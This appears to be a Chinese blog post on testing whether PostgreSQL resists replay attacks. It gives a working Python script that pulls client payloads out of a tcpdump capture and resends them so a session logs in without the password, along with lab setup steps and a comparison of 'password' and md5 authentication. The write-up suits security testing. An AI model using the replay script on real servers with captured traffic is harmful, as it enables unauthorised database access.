当前位置: 首页 > news >正文

PostgreSQL数据库重放攻击测试

        验证pg数据库是否能抵抗重放攻击,首先想到的是TCP重放工具tcpreplay,但是,使用的时候发现,该工具能够模拟重放TCP流量,无法实现重放攻击(有可能是学艺不精不会用,如果你会请指教),也就是我抓取psql登录并执行模型sql操作的TCP数据被抓包之后,tcpreplay能模拟将该抓包数据在网卡上再回放一遍(收和发的所有数据),但是不能模拟psql再对pg数据库进行一次登录操作,也就是不能真正的连接数据库。

        需要的是:抓取psql登录数据库与数据库进行交互的所有有效数据,然后找个工具连接pg数据库服务器再把这些数据按照原始时间和次序再发送一遍,实现不输入密码(使用抓取的通信数据)完成认证登录和sql操作。最终使用如下脚本实现了该功能:

#!/usr/bin/env python3
import dpkt
import socket
import binascii
import argparse
import time

def extract_tcp_payloads(pcap_file, extraction_port):
    """
    从 pcap 文件中提取发往 extraction_port 的 TCP 数据包的有效载荷,
    返回一个列表,每个元素是 (timestamp, hex_payload) 元组,其中 hex_payload 为有效载荷的 16 进制字符串表示。
    同时将提取出的 16 进制数据输出到终端。
    """
    payloads = []
    try:
        with open(pcap_file, 'rb') as f:
            try:
                pcap = dpkt.pcap.Reader(f)
            except Exception as e:
                print(f"读取 pcap 文件时出错:{e}")
                return payloads

            for ts, buf in pcap:
                try:
                    eth = dpkt.ethernet.Ethernet(buf)
                except Exception:
                    continue

                # 处理 IPv4 和 IPv6
                ip = None
                if isinstance(eth.data, dpkt.ip.IP):
                    ip = eth.data
                elif isinstance(eth.data, dpkt.ip6.IP6):
                    ip = eth.data
                else:
                    continue

                # 仅关心 TCP 数据包
                if not isinstance(ip.data, dpkt.tcp.TCP):
                    continue

                tcp = ip.data
                # 仅提取有效载荷长度大于 0 且目标端口为 extraction_port 的数据包
                if tcp.dport == extraction_port and len(tcp.data) > 0:
                    hex_payload = binascii.hexlify(tcp.data).decode('ascii')
                    payloads.append((ts, hex_payload))
                    print(f"提取到数据包,时间戳:{ts:.6f},16进制有效载荷:{hex_payload}")
    except FileNotFoundError:
        print(f"文件 {pcap_file} 未找到。")
    except Exception as ex:
        print(f"处理 pcap 文件时发生错误:{ex}")

    # 排序:确保按照时间戳从小到大排序
    payloads.sort(key=lambda x: x[0])
    return payloads

def send_payloads_with_interval(payloads, dest_ip, dest_port):
    """
    建立一个新的 TCP 连接到指定的目标地址,按照数据包捕获时的时间间隔顺序发送 payloads 中的内容。
    提取的数据为 16 进制字符串,发送时先将其转换为原始二进制数据,
    并在每次发送后尝试读取对方返回的数据(以 16 进制呈现),捕获 BrokenPipeError 异常。
    """
    print(f"\n建立到 {dest_ip}:{dest_port} 的 TCP 连接...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((dest_ip, dest_port))
    except Exception as e:
        print(f"连接到目标 {dest_ip}:{dest_port} 失败:{e}")
        return

    print("连接成功,开始发送数据...\n")
    # 设置接收超时(秒),用于后续等待返回数据
    sock.settimeout(1)

    if not payloads:
        print("未提取到有效载荷数据。")
        sock.close()
        return

    # 先发送第一个数据包
    t0, first_payload = payloads[0]
    print(f"发送第1个数据包,时间戳:{t0:.6f},发送的原始16进制数据:{first_payload}")
    try:
        raw_payload = binascii.unhexlify(first_payload)
        sock.sendall(raw_payload)
    except BrokenPipeError:
        print(f"BrokenPipeError 在发送第1个数据包时发生,数据:{first_payload}")
        sock.close()
        return

    # 尝试接收返回的数据
    try:
        recv_data = sock.recv(4096)
        if recv_data:
            hex_recv = binascii.hexlify(recv_data).decode('ascii')
            print(f"接收到返回数据:{hex_recv}")
        else:
            print("未接收到返回数据。")
    except socket.timeout:
        print("接收超时,没有返回数据。")

    prev_t = t0
    for i in range(1, len(payloads)):
        ts, hex_payload = payloads[i]
        interval = ts - prev_t
        if interval > 0:
            time.sleep(interval)
        print(f"发送第{i+1}个数据包,时间间隔:{interval:.6f} 秒,时间戳:{ts:.6f},发送的原始16进制数据:{hex_payload}")
        try:
            raw_payload = binascii.unhexlify(hex_payload)
            sock.sendall(raw_payload)
        except BrokenPipeError:
            print(f"BrokenPipeError 在发送第{i+1}个数据包时发生,数据:{hex_payload}")
            break

        # 接收返回数据
        try:
            recv_data = sock.recv(4096)
            if recv_data:
                hex_recv = binascii.hexlify(recv_data).decode('ascii')
                print(f"接收到返回数据:{hex_recv}")
            else:
                print("未接收到返回数据。")
        except socket.timeout:
            print("接收超时,没有返回数据。")
        prev_t = ts

    print("所有数据包已发送完毕。")
    sock.close()

def main():
    parser = argparse.ArgumentParser(
        description="从 pcap 文件中提取发往指定 TCP 端口的有效载荷(16进制),"
                    "并按捕获时的时间顺序重新发送到目标地址,同时输出发送和接收到的16进制数据。")
    parser.add_argument("pcap_file", help="pcap 文件路径")
    parser.add_argument("extraction_port", type=int, help="提取的目标 TCP 端口(例如 5432)")
    parser.add_argument("dest_ip", help="重新发送数据的目标 IP")
    parser.add_argument("dest_port", type=int, help="重新发送数据的目标 TCP 端口")
    args = parser.parse_args()

    print("从 pcap 文件中提取有效载荷数据...")
    payloads = extract_tcp_payloads(args.pcap_file, args.extraction_port)
    if not payloads:
        print("未找到符合条件的 TCP 有效载荷数据包。")
        return

    print(f"\n共提取到 {len(payloads)} 个数据包。")
    send_payloads_with_interval(payloads, args.dest_ip, args.dest_port)

if __name__ == '__main__':
    main()

重放登录验证:

        配置postgresql.conf文件:

                log_connections = on        //客户端连接则记录日志
                log_disconnections = on        //客户端断开则记录日志

                log_statement = 'all'        //记录所有sql操作

        配置pg_hba.conf文件:

                host    all             all             127.0.0.1/32            password

                此处必须为password或trust,因为md5等认证方式是有防止重放攻击功能的 

        tcpdump抓包:

        tcpdump -i lo tcp port 5432 -w 5432-0408-4.pcap

        新开终端进行登录:

        ./psql -d postgres -h 127.0.0.1 -p 5432 -U user1 -W

        此时数据库服务端会有客户端连接和用户登录日志提示

        将上面的抓包数据重放:

        python3 extract_and_send_3.py 5432-0408-4.pcap 5432 127.0.0.1 5432

                extract_and_send_3.py:上面的重放攻击脚本

                5432-0408-4.pcap:上面tcpdump抓包工具抓取的User登录数据

                5432:从抓包数据中提取发往5432端口的数据

                127.0.0.1 5432:将提取的数据重新发往该IP地址和端口

        此时在pg数据库服务端应该再次复现了客户端连接和用户登录日志提示。

        然后再修改pg_hba.conf文件使user1使用md5认证,再次按照上述抓包和回放步骤验证:回放工具回放抓包数据失败,服务端仅提示客户端连接但没有登录成功和sql操作日志提示,证明了md5认证算法有防止重放攻击的功能。

相关文章:

  • 【大模型理论篇】SWIFT: 可扩展轻量级的大模型微调基础设施
  • [ctfshow web入门] web26
  • 通过发票四要素信息核验增值税发票真伪-iOS发票查验接口
  • 第12/100节:关键路径
  • HTTP GET 和 POST 请求有什么区别
  • spring-cloud-starter-alibaba-sentinel使用说明
  • linux--------------进程控制(下)
  • WPF如何修改三方控件库的样式
  • AudioRecord 录制pcm转wav
  • 每日一题(小白)数组娱乐篇17
  • 滑动窗口7:30. 串联所有单词的子串
  • 分布式数据库LSM树
  • 多模态大语言模型arxiv论文略读(七)
  • Unity-Xlua热更和AssetBundle详解
  • 上下拉电阻详解
  • RAG 系统中的偏差是什么?
  • 自定义数据结构的QVariant序列化 ASSERT failure in QVariant::save: “invalid type to save“
  • BetaFlight参数配置解读
  • 软考高项-考前冲刺资料-M 类【项目管理类】【光头张老师出品】
  • C++:模拟实现string
  • 保证断电、碰撞等事故中车门系统能够开启!隐藏式门把手将迎来强制性国家标准
  • 昆明阳宗海风景名胜区19口井违规抽取地热水,整改后用自来水代替温泉
  • 男子煎服15克山豆根中毒送医,医生:不能盲目相信偏方
  • 巴国家安全委员会授权军方自主决定对印反击措施
  • 碧桂园服务:拟向杨惠妍全资持有的公司提供10亿元贷款,借款将转借给碧桂园用作保交楼
  • 潘功胜:央行将创设科技创新债券风险分担工具